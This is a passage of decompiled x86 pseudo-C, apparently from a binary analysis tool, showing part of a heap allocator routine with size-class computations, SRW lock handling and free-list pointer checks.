				signed int _t1144;
				signed char _t1145;
				signed int _t1152;
				signed int _t1155;
				signed int** _t1160;
				signed int _t1162;
				signed int _t1165;
				intOrPtr _t1167;
				signed int _t1179;
				signed int _t1187;
				signed int _t1192;
				signed int _t1196;
				signed int _t1202;
				signed char _t1203;
				signed int _t1209;
				signed int _t1211;
				signed int _t1217;
				signed char _t1218;
				signed int _t1225;
				signed int _t1231;
				signed int _t1240;
				signed int _t1245;
				signed int _t1247;
				signed int _t1253;
				signed char _t1254;
				signed int _t1257;
				signed int _t1261;
				void* _t1269;
				signed int _t1270;
				signed int _t1271;
				signed int _t1273;
				char _t1281;
				char _t1284;
				void* _t1292;
				signed int _t1293;
				signed int _t1295;
				signed int _t1299;
				void* _t1302;
				signed int _t1307;
				signed int _t1308;
				signed int _t1318;
				signed int _t1321;
				void* _t1324;
				signed int _t1330;
				signed int _t1331;
				signed int _t1340;
				signed int _t1341;
				signed int _t1346;
				signed int _t1352;
				signed int _t1353;
				signed int _t1359;
				signed int _t1360;
				signed char _t1364;
				signed int _t1368;
				signed int _t1370;
				signed short _t1371;
				signed int _t1373;
				signed char* _t1376;
				signed int _t1377;
				signed int _t1378;
				signed short _t1379;
				signed char _t1385;
				signed int _t1393;
				signed int _t1395;
				signed char _t1398;
				signed int _t1403;
				signed int* _t1414;
				signed int _t1416;
				signed int _t1420;
				signed int _t1422;
				signed short _t1423;
				char* _t1426;
				signed int _t1428;
				signed int* _t1437;
				signed int* _t1438;
				signed int** _t1440;
				signed int* _t1443;
				signed char _t1452;
				signed int _t1459;
				signed int _t1460;
				signed int _t1461;
				signed int _t1463;
				void* _t1466;
				signed int _t1474;
				void* _t1484;

				_t1463 = (_t1461 & 0xfffffff0) - 0x20;
				_t1358 = __ecx;
				_t757 =  *0xd40014; // 0xfbddd969
				_v24 = _t757 ^ _t1459;
				_t759 =  *0xd43e38; // 0x0
				_t1029 =  *[fs:0x2c];
				_t760 =  *(_t1029 + _t759 * 4);
				_t1420 = 0;
				if( *((intOrPtr*)( *(_t1029 + _t759 * 4) + 0xa0)) == 1) {
					L11:
					E00CFE643(_t760, _t990, _v24 ^ _t1459, _t1261, _t1358, _t1420);
					return _t1420;
				} else {
					_t760 =  *(__ecx + 0x13d0);
					if( *(__ecx + 0x13d0) != 0) {
						goto L11;
					} else {
						asm("lock xadd [edi+0x13d0], eax");
						if(1 == 0x7fffffff) {
							L16:
							asm("int3");
							asm("ud2");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1459);
							_t1460 = _t1463;
							_push(_t990);
							_push(_t1358);
							_push(_t1420);
							_t1466 = (_t1463 & 0xfffffff0) - 0x50;
							_t1421 = _v32;
							_t991 = _v36;
							_t1359 = _v40;
							_t764 =  *0xd40014; // 0xfbddd969
							_t765 = _t764 ^ _t1460;
							_v72 = _t765;
							_t1262 = _v44;
							__eflags = _t1359;
							if(_t1359 == 0) {
								__eflags = _t1262 & 0x00000010;
								if((_t1262 & 0x00000010) != 0) {
									__eflags = _t991;
									if(_t991 == 0) {
										_t1422 = 1;
									} else {
										_t1422 = _t991;
									}
									_t1421 = _t1422 +  *((intOrPtr*)(_t1029 + 0xc));
									__eflags = _t1421 - _t991;
									if(_t1421 < _t991) {
										goto L353;
									} else {
										_t768 =  *(_t1029 + 2) & 0x000000ff;
										__eflags = _t768 - 2;
										_v124 = _t1421;
										_t992 = _t1029;
										if(_t768 == 2) {
											_t1034 = 0x20;
											__eflags = _t1421;
											if(_t1421 != 0) {
												asm("bsr ecx, esi");
												_t1034 = 0x3f;
												__eflags = 0x20;
											}
											_t770 = 0x20 - _t1034;
											_t771 = (_t1421 >> ( *(0xd35a40 - _t1034) & 0x000000ff) & 0x00000007) + _t770 * 8;
											__eflags = ( *(0xd35a44 + _t770 * 4) & _t1421) - 1;
											asm("sbb eax, 0xffffffff");
											_t289 = _t771 + 0xd3580c; // 0x0
											_t1423 =  *((_t1421 >> ( *(0xd35a40 - _t1034) & 0x000000ff) & 0x00000007) + _t770 * 8 + _t289) & 0x0000ffff;
										} else {
											__eflags = _t768 - 1;
											if(_t768 != 1) {
												_t1348 = 0x20;
												__eflags = _t1421;
												if(_t1421 != 0) {
													asm("bsr edx, esi");
													_t1348 = 0x3f;
													__eflags = 0x20;
												}
												_t1416 = _t1421;
												_t974 = 0x20 - _t1348;
												_t1245 =  *(0xd35a44 + _t974 * 4) & _t1416;
												__eflags = _t1245 - 1;
												asm("sbb eax, 0xffffffff");
												_t976 =  *((_t1421 >> ( *(0xd35a40 - _t1348) & 0x000000ff) & 0x00000007) + _t974 * 8 + (_t1421 >> ( *(0xd35a40 - _t1348) & 0x000000ff) & 0x00000007) + _t974 * 8 + 0xd3580c) & 0x0000ffff;
												_t1416 - 0x41 = _t976 - 0x76;
												_t1423 = (_t1348 & 0xffffff00 | _t976 - 0x00000076 > 0x00000000) & (_t1245 & 0xffffff00 | _t1416 - 0x00000041 >= 0x00000000) & 0x000000ff | _t976;
											} else {
												_t1247 = _t1421 - 0x101;
												_t977 = _t1421;
												__eflags = _t1247 - 0xfefe;
												if(_t1247 <= 0xfefe) {
													__eflags = _v124 == 1;
													if(_v124 == 1) {
														_t1254 = 0x20;
													} else {
														asm("bsr ecx, eax");
														_t1254 = _t1247 ^ 0x0000001f;
													}
													__eflags = 1 - _v124;
													_t977 =  <  ? 1 <<  ~_t1254 : 0xbadbb1 >> 2;
												}
												_t1457 = 0x20;
												__eflags = _t977;
												if(_t977 != 0) {
													asm("bsr esi, eax");
													_t1457 = 0x3f;
													__eflags = 0x20;
												}
												_t1352 = 0x20 - _t1457;
												_t1353 = (_t977 >> ( *(0xd35a40 - _t1457) & 0x000000ff) & 0x00000007) + _t1352 * 8;
												__eflags = ( *(0xd35a44 + _t1352 * 4) & _t977) - 1;
												asm("sbb edx, 0xffffffff");
												_t1253 =  *(_t1353 + _t1353 + 0xd3580c) & 0x0000ffff;
												_t977 - 0x41 = _t1253 - 0x76;
												_t1423 = (_t1353 & 0xffffff00 | _t1253 - 0x00000076 > 0x00000000) & (_t977 & 0xffffff00 | _t977 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1253;
												__eflags = _t1423;
											}
										}
										_v108 = 0;
										_v104 = 0xffffffff;
										_t1262 = _t992;
										_t993 =  *_t992 & 0x000000ff;
										__eflags = _t993 - 2;
										if(_t993 == 2) {
											_t772 =  *0xd43d89 & 0x000000ff;
											__eflags = _t772 & 0x00000001;
											if((_t772 & 0x00000001) != 0) {
												L00CD7BD0(_t993, _t1484);
											}
										}
										__eflags =  *((char*)(_t1262 + 3));
										_v120 = _t993;
										if( *((char*)(_t1262 + 3)) == 0) {
											_t991 = (_t1423 & 0x0000ffff) << 5;
											_t1421 = _t1262 + _t991 + 0x48;
											_v136 = _t1262;
											_t550 = _t1262 + 0x40; // 0x6c
											_t773 = _t550;
											_v128 = _t773;
											__imp__TryAcquireSRWLockExclusive(_t773);
											__eflags = _t773;
											if(_t773 == 0) {
												L00CC8B90(_t773, _v132);
											}
											_t774 =  *_t1421;
											_t1038 =  *_t774;
											_v136 = _t1038;
											__eflags = _t1038;
											if(_t1038 == 0) {
												goto L336;
											} else {
												_t1273 = _v140;
												_v112 = 0;
												_t1425 =  *((intOrPtr*)(_t1273 + 0x48 + _t991 + 0xc));
												_t991 =  *((intOrPtr*)(_t1273 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1273 + 0xc));
												_t1262 =  *_v136;
												__eflags = _t1262;
												if(_t1262 == 0) {
													 *_t774 = 0;
													goto L314;
												} else {
													_t1059 = _t1262;
													asm("bswap ecx");
													__eflags = (_t1059 ^ _v136) - 0x1fffff;
													if((_t1059 ^ _v136) > 0x1fffff) {
														goto L344;
													} else {
														__eflags = _t1059 & 0x001fc000;
														if((_t1059 & 0x001fc000) == 0) {
															goto L344;
														} else {
															asm("prefetcht0 [ecx]");
															 *_t774 = _t1059;
															goto L314;
														}
													}
												}
											}
										} else {
											_t961 =  *0xd43e38; // 0x0
											_t1414 =  *( *((intOrPtr*)( *[fs:0x2c] + _t961 * 4)) + 0xa0);
											_v128 = _t1423 & 0x0000ffff;
											__eflags = _t1414 - 2;
											if(_t1414 < 2) {
												_push( &_v104);
												_push(_v128);
												_t1421 = _t1262;
												_t965 = E00CD9960(_t1262);
												_v140 = _t965;
												goto L220;
											} else {
												_t1414[2] = _t1414[2] + 1;
												asm("adc dword [edi+0xc], 0x0");
												_t1025 = _t1423 & 0x0000ffff;
												__eflags =  *0xd42d20 - _t1025;
												if( *0xd42d20 < _t1025) {
													_t1452 = _t1262;
													_t1414[0xa] = _t1414[0xa] + 1;
													asm("adc dword [edi+0x2c], 0x0");
													_t1414[6] = _t1414[6] + 1;
													asm("adc dword [edi+0x1c], 0x0");
													goto L291;
												} else {
													_t969 =  *(_t1414 + 0x58 + _t1025 * 8);
													__eflags = _t969;
													if(_t969 == 0) {
														_t1414[8] = _t1414[8] + 1;
														asm("adc dword [edi+0x24], 0x0");
														_t1414[6] = _t1414[6] + 1;
														asm("adc dword [edi+0x1c], 0x0");
														_t1452 = _t1262;
														E00CC85A0(_t1414, _t1025);
														_t1262 = _t1452;
														_t969 =  *(_t1414 + 0x58 + _t1025 * 8);
														__eflags = _t969;
														if(_t969 != 0) {
															goto L215;
														} else {
															goto L291;
														}
													} else {
														_t1414[4] = _t1414[4] + 1;
														asm("adc dword [edi+0x14], 0x0");
														L215:
														_t1421 =  *(_t1414 + 0x5e + _t1025 * 8) & 0x0000ffff;
														_v132 = _t969;
														_t971 =  *_t969;
														__eflags = _t971;
														if(_t971 == 0) {
															_t1240 = 0;
															__eflags = 0;
															goto L219;
														} else {
															_t1240 = _t971;
															asm("bswap ecx");
															__eflags = _t1240 & 0x001fc000;
															if((_t1240 & 0x001fc000) == 0) {
																asm("pcmpeqd xmm0, xmm0");
																asm("movdqa [esp+0x30], xmm0");
																_t1364 =  &_v96;
																_t1060 = _t1364;
																_push(0);
																_push(_t971);
																goto L323;
															} else {
																asm("prefetcht0 [ecx]");
																L219:
																 *((char*)(_t1414 + 0x5c + _t1025 * 8)) =  *((char*)(_t1414 + 0x5c + _t1025 * 8)) - 1;
																 *(_t1414 + 0x58 + _t1025 * 8) = _t1240;
																_v104 = _t1421;
																 *_t1414 =  *_t1414 - _t1421;
																__eflags =  *_t1414;
																L220:
																_t1047 = _v124;
																__eflags = _t1047;
																_t765 = _v0;
																if(_t1047 == 0) {
																	_t1452 = _t1262;
																	_t1025 = _v120;
																	L291:
																	_t991 = _t1025 << 5;
																	_t966 = _t1452;
																	_t1421 = _t1452 + _t991 + 0x48;
																	_v128 = _t966;
																	_t967 = _t966 + 0x40;
																	_v120 = _t967;
																	__imp__TryAcquireSRWLockExclusive(_t967);
																	__eflags = _t967;
																	if(_t967 == 0) {
																		L00CC8B90(_t967, _v124);
																	}
																	_t774 =  *_t1421;
																	_t1231 =  *_t774;
																	_v128 = _t1231;
																	__eflags = _t1231;
																	if(_t1231 == 0) {
																		L336:
																		_t765 = L00CD87D0(_t1421, _v140, _v0, _v128, 0x4000,  &_v112); // executed
																		_v156 = _t765;
																		__eflags = _t765;
																		if(_t765 == 0) {
																			goto L354;
																		} else {
																			_t1269 = (_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) - (( *((_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																			_t774 = _t1269 + 0x1000;
																			__eflags =  *(_t1269 + 0x100f) & 0x00000008;
																			if(( *(_t1269 + 0x100f) & 0x00000008) != 0) {
																				_t1043 =  &(_t774[8]);
																			} else {
																				_t1043 = _t774[2] + 0xc;
																				__eflags = _t1043;
																			}
																			_t991 =  *_t1043 -  *((intOrPtr*)(_v140 + 0xc));
																			goto L315;
																		}
																	} else {
																		_t1346 = _v132;
																		_v104 = 0;
																		_t1425 =  *((intOrPtr*)(_t1346 + 0x48 + _t991 + 0xc));
																		_t991 =  *((intOrPtr*)(_t1346 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1346 + 0xc));
																		_t1364 =  *_v128;
																		__eflags = _t1364;
																		if(_t1364 == 0) {
																			__eflags = 0;
																			goto L313;
																		} else {
																			_t1262 = _t1364;
																			asm("bswap edx");
																			__eflags = (_t1262 ^ _v128) - 0x1fffff;
																			if((_t1262 ^ _v128) > 0x1fffff) {
																				goto L345;
																			} else {
																				__eflags = _t1262 & 0x001fc000;
																				if((_t1262 & 0x001fc000) == 0) {
																					goto L345;
																				} else {
																					asm("prefetcht0 [edx]");
																					L313:
																					 *_t774 = 0;
																					L314:
																					_t1058 = _t774[3] & 0xffffc001 | _t774[3] + 0x00000002 & 0x00003ffe;
																					__eflags = _t1058;
																					_t774[3] = _t1058;
																					L315:
																					_t1270 = _v140;
																					_t782 =  *((intOrPtr*)(_t1270 + 0x117c)) +  *(_t774[2] + 0xc);
																					 *((intOrPtr*)(_t1270 + 0x117c)) = _t782;
																					_t1421 = _v140;
																					_t1046 =  *((intOrPtr*)(_t1421 + 0x1180));
																					__eflags = _t1046 - _t782;
																					_t783 =  >  ? _t1046 : _t782;
																					 *((intOrPtr*)(_t1421 + 0x1180)) =  >  ? _t1046 : _t782;
																					__imp__ReleaseSRWLockExclusive(_v132);
																					_t1271 = _t1421;
																					_t765 = _v0;
																					_t1047 = _v140;
																					goto L222;
																				}
																			}
																		}
																	}
																} else {
																	_t991 = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																	__eflags = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																	L222:
																	_t1360 =  *((intOrPtr*)(_t1271 + 0x10)) + _t1047;
																	__eflags = _t765 & 0x00000002;
																	if((_t765 & 0x00000002) != 0) {
																		__eflags = _v116;
																		if(_v116 == 0) {
																			_t1421 = _t1271;
																			_t991 = _t1047;
																			_t765 = E00D011A0(_t1360, _t1360, 0, _t1047);
																		}
																	}
																	__eflags =  *((char*)(_t1271 + 6));
																	_t1262 = _v128 & 0x000000ff;
																	if( *((char*)(_t1271 + 6)) != 0) {
																		__eflags = _t1047 & 0x00000fff;
																		if((_t1047 & 0x00000fff) == 0) {
																			_t1421 = _t1047;
																			_t765 = (_t1047 & 0xffe00000) + (_t1047 >> 0x00000009 & 0x00000ff8) + 0x2000;
																		} else {
																			_t765 = _t1047 - 4;
																		}
																		 *_t765 = 1;
																	}
																	__eflags = _t1262 - 2;
																	if(_t1262 == 2) {
																		_t765 = _t1047 >> 0x15;
																		__eflags =  *((short*)(_t765 + _t765 + 0xd42d24)) - 0xfffe;
																		if( *((short*)(_t765 + _t765 + 0xd42d24)) == 0xfffe) {
																			_t765 = _t1047 & 0xffe00000;
																			_t1262 = 3 << (_t1047 >> 0x00000002 & 0x0000001e);
																			_t991 = _t1047 >> 0x00000005 & 0x0000fffc;
																			asm("lock or [ebx+eax+0x4000], edx");
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_v108 = 0;
									_t765 =  *0xd560d0 & 0x000000ff;
									_v120 = _t765;
									__eflags = _t765 & 0x00000001;
									if((_t765 & 0x00000001) != 0) {
										goto L271;
									} else {
										goto L113;
									}
								}
							} else {
								__eflags = _t991;
								if(_t991 == 0) {
									_t765 = E00CDB3A0(_t1484, _t1359);
									_t1360 = 0;
								} else {
									__eflags = _t991 - 0x7fe00001;
									if(_t991 < 0x7fe00001) {
										L22:
										_v132 = _t1029;
										__eflags = _t1262 & 0x00000010;
										_t1066 =  *0xd560d0 & 0x000000ff & (_t765 & 0xffffff00 | (_t1262 & 0x00000010) == 0x00000000);
										_v108 = 0xffffffff;
										_v128 = _t1066;
										__eflags = _t1066 - 1;
										if(_t1066 == 1) {
											_t1421 = _t1262;
											_t798 = E00CEC4C0( &_v108, _t1360);
											_t1466 = _t1466 + 8;
											__eflags = _t798;
											if(_t798 == 0) {
												goto L23;
											} else {
												goto L30;
											}
										} else {
											L23:
											_t1368 = (_t1360 >> 0x00000009 & 0x00000fe0) + (_t1360 & 0xffe00000) - (( *((_t1360 >> 0x00000009 & 0x00000fe0) + (_t1360 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
											_t805 = _t1368 & 0xffe01000;
											_t999 =  *_t805;
											_t1421 = _t999 + 0x40;
											__imp__TryAcquireSRWLockExclusive(_t1421);
											__eflags = _t805;
											if(_t805 == 0) {
												L00CC8B90(_t805, _t1421);
											}
											__eflags =  *(_t1368 + 0xf) & 0x00000008;
											if(( *(_t1368 + 0xf) & 0x00000008) != 0) {
												_t806 = _t1368 + 0x20;
											} else {
												_t806 =  *((intOrPtr*)(_t1368 + 8)) + 0xc;
												__eflags = _t806;
											}
											_v112 =  *_t806 -  *((intOrPtr*)(_t999 + 0xc));
											_t809 =  *((intOrPtr*)(_t1368 + 8));
											__eflags =  *((char*)(_t809 + 0x10));
											if( *((char*)(_t809 + 0x10)) == 0) {
												_t765 = L00CDB760(_t999, _t1368, _a8);
												__imp__ReleaseSRWLockExclusive(_t1421);
												__eflags = _t765;
												_t991 = _a8;
												_t1360 = _a4;
												if(_t765 == 0) {
													goto L29;
												} else {
													__eflags = _v136;
													if(_v136 != 0) {
														_t765 = E00CEC470(_t1360, _t1360, _t991, _a12);
													}
												}
											} else {
												__imp__ReleaseSRWLockExclusive(_t1421);
												_t991 = _a8;
												_t1360 = _a4;
												_t765 = E00CDB970(_t809, _t999, _t1360, _t1368, _t991);
												__eflags = _t765;
												if(_t765 == 0) {
													L29:
													_t1072 = _v0;
													__eflags = _t1072 & 0x00000010;
													if((_t1072 & 0x00000010) != 0) {
														_t765 = _v140;
														_t1370 =  *((intOrPtr*)(_t765 + 0xc)) + _t991;
														__eflags = _t1370;
														if(_t1370 < 0) {
															goto L351;
														} else {
															_t811 =  *(_t765 + 2) & 0x000000ff;
															__eflags = _t811 - 2;
															_v124 = _t1370;
															if(_t811 == 2) {
																_t1073 = 0x20;
																__eflags = _t1370;
																if(_t1370 != 0) {
																	asm("bsr ecx, edi");
																	_t1073 = 0x3f;
																	__eflags = 0x20;
																}
																_t813 = 0x20 - _t1073;
																__eflags = ( *(0xd35a44 + _t813 * 4) & _t1370) - 1;
																asm("sbb eax, 0xffffffff");
																_t1371 =  *((_t1370 >> ( *(0xd35a40 - _t1073) & 0x000000ff) & 0x00000007) + _t813 * 8 + (_t1370 >> ( *(0xd35a40 - _t1073) & 0x000000ff) & 0x00000007) + _t813 * 8 + 0xd3580c) & 0x0000ffff;
															} else {
																__eflags = _t811 - 1;
																if(_t811 != 1) {
																	_t1336 = 0x20;
																	__eflags = _t1370;
																	if(_t1370 != 0) {
																		asm("bsr edx, edi");
																		_t1336 = 0x3f;
																		__eflags = 0x20;
																	}
																	_t941 = 0x20 - _t1336;
																	_t1209 =  *(0xd35a44 + _t941 * 4) & _t1370;
																	__eflags = _t1209 - 1;
																	asm("sbb eax, 0xffffffff");
																	_t943 =  *((_t1370 >> ( *(0xd35a40 - _t1336) & 0x000000ff) & 0x00000007) + _t941 * 8 + (_t1370 >> ( *(0xd35a40 - _t1336) & 0x000000ff) & 0x00000007) + _t941 * 8 + 0xd3580c) & 0x0000ffff;
																	_t1370 - 0x41 = _t943 - 0x76;
																	_t1371 = (_t1336 & 0xffffff00 | _t943 - 0x00000076 > 0x00000000) & (_t1209 & 0xffffff00 | _t1370 - 0x00000041 >= 0x00000000) & 0x000000ff | _t943;
																} else {
																	_t1211 = _t1370 - 0x101;
																	_t944 = _t1370;
																	__eflags = _t1211 - 0xfefe;
																	if(_t1211 <= 0xfefe) {
																		__eflags = _t1370 == 1;
																		if(_t1370 == 1) {
																			_t1218 = 0x20;
																		} else {
																			asm("bsr ecx, eax");
																			_t1218 = _t1211 ^ 0x0000001f;
																		}
																		__eflags = 1 - _t1370;
																		_t944 =  <  ? 1 <<  ~_t1218 : 0xbadbb1 >> 2;
																	}
																	_t1451 = 0x20;
																	__eflags = _t944;
																	if(_t944 != 0) {
																		asm("bsr esi, eax");
																		_t1451 = 0x3f;
																		__eflags = 0x20;
																	}
																	_t1340 = 0x20 - _t1451;
																	_t1341 = (_t944 >> ( *(0xd35a40 - _t1451) & 0x000000ff) & 0x00000007) + _t1340 * 8;
																	__eflags = ( *(0xd35a44 + _t1340 * 4) & _t944) - 1;
																	asm("sbb edx, 0xffffffff");
																	_t1217 =  *(_t1341 + _t1341 + 0xd3580c) & 0x0000ffff;
																	_t944 - 0x41 = _t1217 - 0x76;
																	_t1371 = (_t1341 & 0xffffff00 | _t1217 - 0x00000076 > 0x00000000) & (_t944 & 0xffffff00 | _t944 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1217;
																	__eflags = _t1371;
																}
															}
															_v112 = 0;
															_v108 = 0xffffffff;
															_t1262 = _v140;
															_t1001 =  *_t1262 & 0x000000ff;
															__eflags = _t1001 - 2;
															if(_t1001 == 2) {
																_t815 =  *0xd43d89 & 0x000000ff;
																__eflags = _t815 & 0x00000001;
																if((_t815 & 0x00000001) != 0) {
																	L00CD7BD0(_t1001, _t1484);
																	_t1262 = _v140;
																}
															}
															__eflags =  *((char*)(_t1262 + 3));
															_v136 = _t1001;
															if( *((char*)(_t1262 + 3)) == 0) {
																_t1373 = (_t1371 & 0x0000ffff) << 5;
																_t1428 = _t1262 + _t1373 + 0x48;
																_t816 = _t1262 + 0x40;
																_v128 = _t816;
																__imp__TryAcquireSRWLockExclusive(_t816);
																__eflags = _t816;
																if(_t816 == 0) {
																	L00CC8B90(_t816, _v132);
																}
																_t817 =  *_t1428;
																_t1064 = _t1428;
																_t1421 =  *_t817;
																__eflags = _t1421;
																if(_t1421 != 0) {
																	goto L180;
																} else {
																	_t795 =  &_v116;
																	goto L327;
																}
															} else {
																_v128 = _t1371 & 0x0000ffff;
																_t1437 =  *( *((intOrPtr*)( *[fs:0x2c] +  *0xd43e38 * 4)) + 0xa0);
																__eflags = _t1437 - 2;
																if(_t1437 < 2) {
																	_push( &_v108);
																	_push(_v128);
																	_t765 = E00CD9960(_t1262);
																	goto L71;
																} else {
																	_t1437[2] = _t1437[2] + 1;
																	asm("adc dword [esi+0xc], 0x0");
																	_t1393 = _t1371 & 0x0000ffff;
																	__eflags =  *0xd42d20 - _t1393;
																	if( *0xd42d20 < _t1393) {
																		_t1437[0xa] = _t1437[0xa] + 1;
																		asm("adc dword [esi+0x2c], 0x0");
																		_t1437[6] = _t1437[6] + 1;
																		asm("adc dword [esi+0x1c], 0x0");
																		goto L177;
																	} else {
																		_t885 =  *(_t1437 + 0x58 + _t1393 * 8);
																		__eflags = _t885;
																		if(_t885 == 0) {
																			_t1437[8] = _t1437[8] + 1;
																			asm("adc dword [esi+0x24], 0x0");
																			_t1437[6] = _t1437[6] + 1;
																			asm("adc dword [esi+0x1c], 0x0");
																			E00CC85A0(_t1437, _t1393);
																			_t885 =  *(_t1437 + 0x58 + _t1393 * 8);
																			__eflags = _t885;
																			if(_t885 != 0) {
																				goto L66;
																			} else {
																				_t1262 = _v140;
																				goto L177;
																			}
																		} else {
																			_t1437[4] = _t1437[4] + 1;
																			asm("adc dword [esi+0x14], 0x0");
																			L66:
																			_t991 =  *(_t1437 + 0x5e + _t1393 * 8) & 0x0000ffff;
																			_t1262 = _t885;
																			_t887 =  *_t885;
																			__eflags = _t887;
																			if(_t887 == 0) {
																				_t1152 = 0;
																				__eflags = 0;
																				goto L70;
																			} else {
																				_t1152 = _t887;
																				asm("bswap ecx");
																				__eflags = _t1152 & 0x001fc000;
																				if((_t1152 & 0x001fc000) == 0) {
																					goto L156;
																				} else {
																					asm("prefetcht0 [ecx]");
																					L70:
																					 *((char*)(_t1437 + 0x5c + _t1393 * 8)) =  *((char*)(_t1437 + 0x5c + _t1393 * 8)) - 1;
																					 *(_t1437 + 0x58 + _t1393 * 8) = _t1152;
																					_v108 = _t991;
																					 *_t1437 =  *_t1437 - _t991;
																					__eflags =  *_t1437;
																					_t765 = _t1262;
																					L71:
																					_t1262 = _v132;
																					__eflags = _t765;
																					_t1029 = _v0;
																					_t1360 = _a4;
																					if(_t765 == 0) {
																						_t1393 = _v120;
																						L177:
																						_t1373 = _t1393 << 5;
																						_t991 = _t1262 + _t1373 + 0x48;
																						_t883 = _t1262 + 0x40;
																						_v120 = _t883;
																						__imp__TryAcquireSRWLockExclusive(_t883);
																						__eflags = _t883;
																						if(_t883 == 0) {
																							L00CC8B90(_t883, _v124);
																						}
																						_t817 =  *_t991;
																						_t1421 =  *_t817;
																						__eflags = _t1421;
																						if(_t1421 == 0) {
																							goto L326;
																						} else {
																							L180:
																							_t1281 = _v144;
																							_v116 = 0;
																							_t1002 =  *((intOrPtr*)(_t1281 + 0x48 + _t1373 + 0xc));
																							_v136 = _t1002;
																							_t991 = _t1002 -  *((intOrPtr*)(_t1281 + 0xc));
																							_v128 = _t1421;
																							_t1262 =  *_t1421;
																							__eflags = _t1262;
																							if(_t1262 == 0) {
																								_t1078 = 0;
																								__eflags = 0;
																								goto L185;
																							} else {
																								_t1078 = _t1262;
																								asm("bswap ecx");
																								__eflags = (_t1078 ^ _v128) - 0x1fffff;
																								if((_t1078 ^ _v128) > 0x1fffff) {
																									goto L270;
																								} else {
																									__eflags = _t1078 & 0x001fc000;
																									if((_t1078 & 0x001fc000) == 0) {
																										goto L270;
																									} else {
																										asm("prefetcht0 [ecx]");
																										L185:
																										_t1360 = _a4;
																										 *_t817 = _t1078;
																										_t1081 = _t817[3] & 0xffffc001 | _t817[3] + 0x00000002 & 0x00003ffe;
																										__eflags = _t1081;
																										_t817[3] = _t1081;
																										goto L186;
																									}
																								}
																							}
																						}
																					} else {
																						_t991 = _v100 -  *((intOrPtr*)(_t1262 + 0xc));
																						__eflags = _v100 -  *((intOrPtr*)(_t1262 + 0xc));
																						goto L73;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													} else {
														L30:
														_v112 = 0;
														_t952 =  *0xd560d0 & 0x000000ff;
														_v124 = _t952;
														__eflags = _t952 & 0x00000001;
														if((_t952 & 0x00000001) != 0) {
															L157:
															_t1421 = _t1072;
															_t892 = E00CEC3E0( &_v104, _t1072, _t991, _a12);
															_t1466 = _t1466 + 0x10;
															__eflags = _t892;
															if(_t892 == 0) {
																goto L31;
															} else {
																_t1029 = _t1421;
																_t1421 = _v104;
																goto L159;
															}
														} else {
															L31:
															_t765 = _v132;
															_t1155 =  *((intOrPtr*)(_t765 + 0xc)) + _t991;
															__eflags = _t1155;
															if(_t1155 < 0) {
																asm("int3");
																asm("ud2");
																L351:
																asm("int3");
																asm("ud2");
																goto L352;
															} else {
																_t1016 = _t1155;
																_t893 =  *(_t765 + 2) & 0x000000ff;
																__eflags = _t893 - 2;
																_v124 = _t1155;
																if(_t893 == 2) {
																	_t1156 = 0x20;
																	__eflags = _t1016;
																	if(_t1016 != 0) {
																		asm("bsr ecx, ebx");
																		_t1156 = 0x3f;
																		__eflags = 0x20;
																	}
																	_t895 = 0x20 - _t1156;
																	__eflags = ( *(0xd35a44 + _t895 * 4) & _t1016) - 1;
																	asm("sbb eax, 0xffffffff");
																	_v128 =  *((_t1016 >> ( *(0xd35a40 - _t1156) & 0x000000ff) & 0x00000007) + _t895 * 8 + (_t1016 >> ( *(0xd35a40 - _t1156) & 0x000000ff) & 0x00000007) + _t895 * 8 + 0xd3580c) & 0x0000ffff;
																} else {
																	__eflags = _t893 - 1;
																	if(_t893 != 1) {
																		_t1326 = 0x20;
																		__eflags = _t1016;
																		if(_t1016 != 0) {
																			asm("bsr edx, ebx");
																			_t1326 = 0x3f;
																			__eflags = 0x20;
																		}
																		_t926 = 0x20 - _t1326;
																		_t1192 =  *(0xd35a44 + _t926 * 4) & _t1016;
																		__eflags = _t1192 - 1;
																		asm("sbb eax, 0xffffffff");
																		_t928 =  *((_t1016 >> ( *(0xd35a40 - _t1326) & 0x000000ff) & 0x00000007) + _t926 * 8 + (_t1016 >> ( *(0xd35a40 - _t1326) & 0x000000ff) & 0x00000007) + _t926 * 8 + 0xd3580c) & 0x0000ffff;
																		_t1016 - 0x41 = _t928 - 0x76;
																		_v128 = (_t1326 & 0xffffff00 | _t928 - 0x00000076 > 0x00000000) & (_t1192 & 0xffffff00 | _t1016 - 0x00000041 >= 0x00000000) & 0x000000ff | _t928;
																	} else {
																		_t1196 = _t1016 - 0x101;
																		_t929 = _t1016;
																		__eflags = _t1196 - 0xfefe;
																		if(_t1196 <= 0xfefe) {
																			__eflags = _t1016 == 1;
																			if(_t1016 == 1) {
																				_t1203 = 0x20;
																			} else {
																				asm("bsr ecx, eax");
																				_t1203 = _t1196 ^ 0x0000001f;
																			}
																			__eflags = 1 - _t1016;
																			_t929 =  <  ? 1 <<  ~_t1203 : 0xbadbb1 >> 2;
																		}
																		_t1024 = _t1403;
																		_t1447 = 0x20;
																		__eflags = _t929;
																		if(_t929 != 0) {
																			asm("bsr esi, eax");
																			_t1447 = 0x3f;
																			__eflags = 0x20;
																		}
																		_t1330 = 0x20 - _t1447;
																		_t1331 = (_t929 >> ( *(0xd35a40 - _t1447) & 0x000000ff) & 0x00000007) + _t1330 * 8;
																		__eflags = ( *(0xd35a44 + _t1330 * 4) & _t929) - 1;
																		asm("sbb edx, 0xffffffff");
																		_t1202 =  *(_t1331 + _t1331 + 0xd3580c) & 0x0000ffff;
																		_t929 - 0x41 = _t1202 - 0x76;
																		_t932 = (_t1331 & 0xffffff00 | _t1202 - 0x00000076 > 0x00000000) & (_t929 & 0xffffff00 | _t929 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1202;
																		__eflags = _t932;
																		_v128 = _t932;
																		_t1360 = _t1024;
																	}
																}
